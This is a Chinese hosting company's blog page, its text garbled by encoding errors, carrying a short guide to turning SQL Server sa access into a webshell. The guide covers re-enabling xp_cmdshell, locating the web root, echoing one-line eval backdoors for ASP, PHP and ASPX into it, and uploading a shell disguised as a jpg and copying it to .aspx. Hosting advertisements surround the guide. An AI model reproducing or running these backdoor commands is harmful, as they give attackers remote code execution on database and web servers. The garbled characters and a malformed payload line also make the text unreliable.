sa權(quán)限獲取webshell思路

創(chuàng)新互聯(lián)從2013年創(chuàng)立，是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司，擁有項(xiàng)目做網(wǎng)站、網(wǎng)站建設(shè)網(wǎng)站策劃，項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個(gè)夢(mèng)想脫穎而出為使命，1280元環(huán)縣做網(wǎng)站,已為上家服務(wù),為環(huán)縣各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:13518219792

  1.通過(guò)SQL查詢分析器通過(guò)sa權(quán)限首先恢復(fù)xp_cmdshell存儲(chǔ)過(guò)程。

  2.通過(guò)SQL Tools2.0連接數(shù)據(jù)庫(kù)，執(zhí)行命令，查看網(wǎng)站路徑以及磁盤文件，獲取網(wǎng)站的真實(shí)路徑。

  3.echo生成一句話后門。

  4.直接獲取webshell權(quán)限。

  5.如果echo生成的一句話后門無(wú)法執(zhí)行，可以通過(guò)查看對(duì)應(yīng)網(wǎng)站的數(shù)據(jù)庫(kù)，獲取后臺(tái)登陸密碼，通過(guò)后臺(tái)上傳webshell的jpg。然后通過(guò)copy命令將jgp文件復(fù)制為aspx文件，從而獲取webshell。

技巧：

  1.尋找可寫的文件夾，例如c:/windows/temp，以及網(wǎng)站的真實(shí)路勁。

  2.通過(guò)echo命令生成一句話后門

  echo ^<%eval request(cmd)% ^>^>d:\wwwroot\ok.asp

  echo ^<?php @eval($_POST[cmd]);?^>^>cmd.php

  echo ^<%@ PageLanguage="Jscript%"^>^<^%eval(Request.Item["pass"],"unsafe");%^>^>c:\inetpub\wwwroot\cmd.aspx

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

網(wǎng)頁(yè)名稱：sa權(quán)限獲取webshell思路-創(chuàng)新互聯(lián)
文章地址：http://www.rwnh.cn/article28/hdhjp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供虛擬主機(jī)、網(wǎng)站維護(hù)、網(wǎng)站收錄、標(biāo)簽優(yōu)化、自適應(yīng)網(wǎng)站、網(wǎng)站策劃

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)